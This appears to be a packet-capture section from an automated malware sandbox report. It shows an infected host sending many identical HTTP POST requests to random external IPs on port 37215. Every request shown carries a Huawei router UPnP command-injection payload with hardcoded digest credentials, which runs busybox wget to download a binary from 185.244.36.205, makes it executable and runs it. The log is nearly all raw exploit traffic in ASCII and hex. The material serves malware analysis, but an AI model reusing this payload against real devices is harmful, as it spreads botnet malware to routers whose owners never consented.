                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              985192.168.2.1560226121.35.28.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928045034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              986192.168.2.1541546156.80.81.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928047895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              987192.168.2.1540834190.50.162.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928059101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              988192.168.2.154130237.38.49.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928080082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              989192.168.2.1534752121.66.101.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928093910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              990192.168.2.1542822138.103.161.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928128004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              991192.168.2.153667666.184.73.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928131104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              992192.168.2.154012245.169.107.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928157091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              993192.168.2.1546176181.52.228.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928174019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              994192.168.2.1559138156.195.122.25337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928178072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              995192.168.2.1546044121.108.135.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928181887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
